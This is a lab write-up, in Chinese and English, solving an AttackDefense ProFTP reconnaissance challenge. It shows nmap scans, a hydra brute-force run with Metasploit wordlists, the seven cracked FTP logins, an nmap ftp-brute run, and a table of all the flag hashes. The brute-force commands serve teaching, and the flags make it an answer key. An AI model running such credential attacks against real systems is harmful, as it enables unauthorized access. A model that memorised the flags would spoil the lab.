FTP
1
2
3
| ip a
inet 192.213.157.2/24
|
1
2
3
4
| namp 192.213.157.3
PORT STATE SERVICE
21/tcp open ftp
|
1
2
3
4
5
6
| nmap 192.213.157.3 -p 21 -sV -O
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
Aggressive OS guesses: Linux 2.6.32 (96%)
|
1
2
| ftp 192.213.157.3
ftp> bye
|
1
| hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.213.157.3 ftp
|
1
2
3
4
5
6
7
8
9
| ftp 192.213.157.3
Name (192.213.157.3:root): sysadmin
331 Password required for sysadmin
Password: 654321
230 User sysadmin logged in
ftp> ls
ftp> help
ftp> get secret.txt
ftp> bye
|
1
2
| echo "sysadmin" > users
cat users
|
1
| nmap 192.213.157.3 --script ftp-brute --script-args userdb=/root/users -p 21
|
ProFTP Recon: Basics(ProFTP 侦察:基础知识)
概述
在这个挑战中,我们将了解 ProFTP 服务器侦察的基础知识。请开始实验并回答以下问题:
问题
- FTP服务器的版本是多少?
- 使用用户名字典 /usr/share/metasploit-framework/data/wordlists/common_users.txt 和密码字典 /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 检查这些凭据是否在系统上有效. 列出所有找到的凭据。
- 使用 nmap 脚本查找用户“sysadmin”的密码。
- 找到隐藏在服务器上的七个标志。
指示:
- 这个实验室是献给你的!此网络上没有其他用户 :)
- 开始实验后,您将可以访问 Kali 实例的根终端
- 你的 Kali 有一个 IP 地址为 192.XYZ 的接口运行“ip addr”以了解 X 和 Y 的值。
- 目标机器应位于 IP 地址 192.XY3。
- 不要攻击位于 IP 地址 192.XY1 的网关
我自己的思路
In this challenge we will look at the basics of ProFTP server reconnaissance. Please start the lab and answer the following questions:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| root@attackdefense:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: ip_vti0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
link/ipip 0.0.0.0 brd 0.0.0.0
27281: eth0@if27282: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:0a:01:00:0e brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.1.0.14/16 brd 10.1.255.255 scope global eth0
valid_lft forever preferred_lft forever
27284: eth1@if27285: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:c0:d5:c0:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 192.213.192.2/24 brd 192.213.192.255 scope global eth1
valid_lft forever preferred_lft forever
|
1
2
3
4
5
6
7
8
9
10
| root@attackdefense:~# nmap 192.213.192.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-21 02:42 UTC
Nmap scan report for target-1 (192.213.192.3)
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
21/tcp open ftp
MAC Address: 02:42:C0:D5:C0:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
|
Questions
What is the version of FTP server?
ProFTPD 1.3.5a
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| root@attackdefense:~# nmap 192.213.192.3 -p 21 -sV -O
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-21 02:43 UTC
Nmap scan report for target-1 (192.213.192.3)
Host is up (0.000035s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
MAC Address: 02:42:C0:D5:C0:03 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 2.6.32 (96%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.4 - 3.10 (94%), Synology DiskStation Manager 5.2-5644 (94%), Linux 2.6.32 - 2.6.35 (94%), Linux 2.6.32 - 3.5 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Unix
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.11 seconds
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| root@attackdefense:~# ftp 192.213.192.3
Connected to 192.213.192.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.213.192.3]
Name (192.213.192.3:root):
331 Password required for root
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
530 Please login with USER and PASS
ftp: bind: Address already in use
ftp> bye
221 Goodbye.
|
Use the username dictionary /usr/share/metasploit-framework/data/wordlists/common_users.txt and password dictionary /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt to check if any of these credentials work on the system. List all found credentials.
1
2
3
4
5
6
7
| sysadmin 654321
rooty qwerty
demo butterfly
auditor chocolate
anon purple
administrator tweety
diag tigger
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| root@attackdefense:~# hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.213.192.3 ftp
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-21 02:51:44
[DATA] max 16 tasks per 1 server, overall 16 tasks, 7063 login tries (l:7/p:1009), ~442 tries per task
[DATA] attacking ftp://192.213.192.3:21/
[21][ftp] host: 192.213.192.3 login: sysadmin password: 654321
[21][ftp] host: 192.213.192.3 login: rooty password: qwerty
[21][ftp] host: 192.213.192.3 login: demo password: butterfly
[21][ftp] host: 192.213.192.3 login: auditor password: chocolate
[21][ftp] host: 192.213.192.3 login: anon password: purple
[21][ftp] host: 192.213.192.3 login: administrator password: tweety
[21][ftp] host: 192.213.192.3 login: diag password: tigger
1 of 1 target successfully completed, 7 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-08-21 02:52:30
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| root@attackdefense:~# ftp 192.213.192.3
Connected to 192.213.192.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.213.192.3]
Name (192.213.192.3:root): sysadmin
331 Password required for sysadmin
Password:
230 User sysadmin logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 33 Nov 20 2018 secret.txt
226 Transfer complete
ftp> get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful
150 Opening BINARY mode data connection for secret.txt (33 bytes)
226 Transfer complete
33 bytes received in 0.00 secs (402.8320 kB/s)
ftp> bye
221 Goodbye.
root@attackdefense:~# cat secret.txt
260ca9dd8a4577fc00b7bd5810298076
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| root@attackdefense:~# ftp
Connected to 192.213.192.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.213.192.3]
Name (192.213.192.3:root): auditor
331 Password required for auditor
Password:
230 User auditor logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 33 Nov 20 2018 secret.txt
226 Transfer complete
ftp> get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful
150 Opening BINARY mode data connection for secret.txt (33 bytes)
226 Transfer complete
33 bytes received in 0.00 secs (217.7470 kB/s)
ftp> bye
221 Goodbye.
root@attackdefense:~# cat secret.txt
098f6bcd4621d373cade4e832627b4f6
|
Find the password of user “sysadmin” using nmap script.
ftp-brute
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| root@attackdefense:~# echo "sysadmin" > user.lst
root@attackdefense:~# cat user.lst
sysadmin
root@attackdefense:~# nmap --script ftp-brute --script-args userdb=/root/user.lst -p 21 192.213.192.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-21 03:11 UTC
Nmap scan report for target-1 (192.213.192.3)
Host is up (0.000060s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-brute:
| Accounts:
| sysadmin:654321 - Valid credentials
|_ Statistics: Performed 24 guesses in 6 seconds, average tps: 4.0
MAC Address: 02:42:C0:D5:C0:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 6.56 seconds
|
Find seven flags hidden on the server.
| user |
flag |
| sysadmin |
260ca9dd8a4577fc00b7bd5810298076 |
| auditor |
098f6bcd4621d373cade4e832627b4f6 |
| rooty |
e529a9cea4a728eb9c5828b13b22844c |
| demo |
d6a6bc0db10694a2d90e3a69648f3a03 |
| anon |
1bc29b36f623ba82aaf6724fd3b16718 |
| administrator |
21232f297a57a5a743894a0e4a801fc3 |
| diag |
12a032ce9179c32a6c7ab397b9d871fa |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| root@attackdefense:~# ftp 192.213.192.3
Connected to 192.213.192.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.213.192.3]
Name (192.213.192.3:root): rooty
331 Password required for rooty
Password:
230 User rooty logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 33 Nov 20 2018 secret.txt
226 Transfer complete
ftp> get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful
150 Opening BINARY mode data connection for secret.txt (33 bytes)
226 Transfer complete
33 bytes received in 0.00 secs (67.4196 kB/s)
ftp> bye
221 Goodbye.
root@attackdefense:~# cat secret.txt
e529a9cea4a728eb9c5828b13b22844c
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| root@attackdefense:~# ftp 192.213.192.3
Connected to 192.213.192.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.213.192.3]
Name (192.213.192.3:root): demo
331 Password required for demo
Password:
230 User demo logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 33 Nov 20 2018 secret.txt
226 Transfer complete
ftp> get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful
150 Opening BINARY mode data connection for secret.txt (33 bytes)
226 Transfer complete
33 bytes received in 0.00 secs (64.9729 kB/s)
ftp> bye
221 Goodbye.
root@attackdefense:~# cat secret.txt
d6a6bc0db10694a2d90e3a69648f3a03
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| root@attackdefense:~# ftp 192.213.192.3
Connected to 192.213.192.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.213.192.3]
Name (192.213.192.3:root): anon
331 Password required for anon
Password:
230 User anon logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 33 Nov 20 2018 secret.txt
226 Transfer complete
ftp> get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful
150 Opening BINARY mode data connection for secret.txt (33 bytes)
226 Transfer complete
33 bytes received in 0.00 secs (68.7134 kB/s)
ftp> bye
221 Goodbye.
root@attackdefense:~# cat secret.txt
1bc29b36f623ba82aaf6724fd3b16718
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| root@attackdefense:~# ftp 192.213.192.3
Connected to 192.213.192.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.213.192.3]
Name (192.213.192.3:root): administrator
331 Password required for administrator
Password:
230 User administrator logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 33 Nov 20 2018 secret.txt
226 Transfer complete
ftp> get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful
150 Opening BINARY mode data connection for secret.txt (33 bytes)
226 Transfer complete
33 bytes received in 0.00 secs (78.0304 kB/s)
ftp> bye
221 Goodbye.
root@attackdefense:~# cat secret.txt
21232f297a57a5a743894a0e4a801fc3
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| root@attackdefense:~# ftp 192.213.192.3
Connected to 192.213.192.3.
220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.213.192.3]
Name (192.213.192.3:root): diag
331 Password required for diag
Password:
230 User diag logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 0 0 33 Nov 20 2018 secret.txt
226 Transfer complete
ftp> get secret.txt
local: secret.txt remote: secret.txt
200 PORT command successful
150 Opening BINARY mode data connection for secret.txt (33 bytes)
226 Transfer complete
33 bytes received in 0.00 secs (56.9374 kB/s)
ftp> bye
221 Goodbye.
root@attackdefense:~# cat secret.txt
12a032ce9179c32a6c7ab397b9d871fa
|
解决方案
此实验室的解决方案可在以下手册中找到:https://assets.ine.com/labs/ad-manuals/walkthrough-518.pdf
参考:
ProFTPD
hydra
ftp
Script ftp-brute
